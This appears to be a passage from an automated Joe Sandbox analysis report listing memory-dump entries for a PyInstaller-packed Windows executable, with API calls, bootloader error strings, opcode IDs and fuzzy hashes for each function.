                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                • Instruction ID: 6341aadcdf725368f5c7275848db9061061e6c0a630898116aa5093c53237f4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7416F31A1AA87D1EE25FF21E4142E96355FF94384F8002B3DA9C83695EF3CE50AD740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6AAE2351A,?,00000000,00007FF6AAE23F1B), ref: 00007FF6AAE22AA0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                • Instruction ID: 77c97a253648f932d29a8dd7d9edea64f4579d01f1f543fd76b73146513a8af7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E218332A1A78282E721AF55F4817E66394FB887C4F400176EE8D83659DF3CD64A9640
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                • Instruction ID: 47e138084e46beb8e1cdf21d2b4852166bd4296da2757b50a7aad8f7d332e1ad
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80215030F0F642C1F66473256651139A242BF447B0F0447B6D9BECBAE6DE2CA8436720
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                • Instruction ID: 455e124e8f7e8a89842c5f3c9b3b6ba813e8378ade3c33ba20cbe08877f766e0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F118E31B19A82C7E750AB16F85432973A8FB88BE4F004276EA5DC77A4DF3DD8168740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF6AAE23FA9), ref: 00007FF6AAE28EFD
                                                                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF6AAE23FA9), ref: 00007FF6AAE28F5A
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE29390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6AAE245F4,00000000,00007FF6AAE21985), ref: 00007FF6AAE293C9
                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6AAE23FA9), ref: 00007FF6AAE28FE5
                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6AAE23FA9), ref: 00007FF6AAE29044
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6AAE23FA9), ref: 00007FF6AAE29055
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6AAE23FA9), ref: 00007FF6AAE2906A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3462794448-0
                                                                                                                                                                                                                                • Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                • Instruction ID: 7688d93d6300d711da1486e1d2147e8bb39631c4830306906e6eb7ad963769c9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF419072A1A687C1EE30AF52A5106BA7394FB84BC0F4411B6DF8D97789DE3DE906D700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6AAE34F11,?,?,?,?,00007FF6AAE3A48A,?,?,?,?,00007FF6AAE3718F), ref: 00007FF6AAE3B2D7
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6AAE34F11,?,?,?,?,00007FF6AAE3A48A,?,?,?,?,00007FF6AAE3718F), ref: 00007FF6AAE3B30D
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6AAE34F11,?,?,?,?,00007FF6AAE3A48A,?,?,?,?,00007FF6AAE3718F), ref: 00007FF6AAE3B33A
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6AAE34F11,?,?,?,?,00007FF6AAE3A48A,?,?,?,?,00007FF6AAE3718F), ref: 00007FF6AAE3B34B
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6AAE34F11,?,?,?,?,00007FF6AAE3A48A,?,?,?,?,00007FF6AAE3718F), ref: 00007FF6AAE3B35C
                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF6AAE34F11,?,?,?,?,00007FF6AAE3A48A,?,?,?,?,00007FF6AAE3718F), ref: 00007FF6AAE3B377
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                • Instruction ID: 42150906078fdc28befde5fafd26697fbd1d2dd7e56b6d43d91a8511b5db1731
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65115B30E0E652C2FA54B325665113DA142FF447B0F0546F6D8AFCB6E6DE6CA8436720
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6AAE21B6A), ref: 00007FF6AAE2295E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                • Instruction ID: e04d48626e88aa47e1202ca86f426e226446ad4083bcf4f3957bea9553fd0c4b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F131F832B1A68292EB10BB65A8416E76294BF887D4F414173FE8DC3755DF3CD54B9200
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                • String ID: Unhandled exception in script
                                                                                                                                                                                                                                • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                • Instruction ID: 626676d2d966986cb80795e629f624520e1cbbbfbf9fd6bd0212db4b0e884147
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B131723261AA82C9EB20EF21E8552F973A4FF88784F440176EA4E87B59DF3CD106D700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6AAE2918F,?,00007FF6AAE23C55), ref: 00007FF6AAE22BA0
                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF6AAE22C2A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                • Instruction ID: dbf007b850bb3554183459ac169899073e7ce7b152cf3cb5ab3e8383988fc905
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A721AE72B0AB4282E711AF15F8847EA73A4FB88780F404176EA8D97759DF3CD60AD740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6AAE21B99), ref: 00007FF6AAE22760
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                • Instruction ID: 02ed837c5c12a348dd3a23f2d07c6f04b6f826b3d07b20972e6f305506776062
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E218372A1AB8282E710EB50F4417E66394FB883C4F4001B6FE8D83659DF7CD54A9740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                • Instruction ID: be319d82baabbc353829a21b169407c6efcd105f851fde120ddb16ea58398f38
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5F06271B0A706C2EB10AB24E45437A6324FF89761F540376D66EC66F4DF6DD446E310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                • Instruction ID: 26282d41002021bcf50b444ab90075c861cacd6ec76f728bdb3ccb520eebc428
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9118232E5DA0383FA643565E4953791058BF5A360E04C7B6EA6EF63DA8E6F6C437100
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF6AAE3A5A3,?,?,00000000,00007FF6AAE3A83E,?,?,?,?,?,00007FF6AAE3A7CA), ref: 00007FF6AAE3B3AF
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6AAE3A5A3,?,?,00000000,00007FF6AAE3A83E,?,?,?,?,?,00007FF6AAE3A7CA), ref: 00007FF6AAE3B3CE
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6AAE3A5A3,?,?,00000000,00007FF6AAE3A83E,?,?,?,?,?,00007FF6AAE3A7CA), ref: 00007FF6AAE3B3F6
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6AAE3A5A3,?,?,00000000,00007FF6AAE3A83E,?,?,?,?,?,00007FF6AAE3A7CA), ref: 00007FF6AAE3B407
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6AAE3A5A3,?,?,00000000,00007FF6AAE3A83E,?,?,?,?,?,00007FF6AAE3A7CA), ref: 00007FF6AAE3B418
                                                                                                                                                                                                                                Memory Dump Source
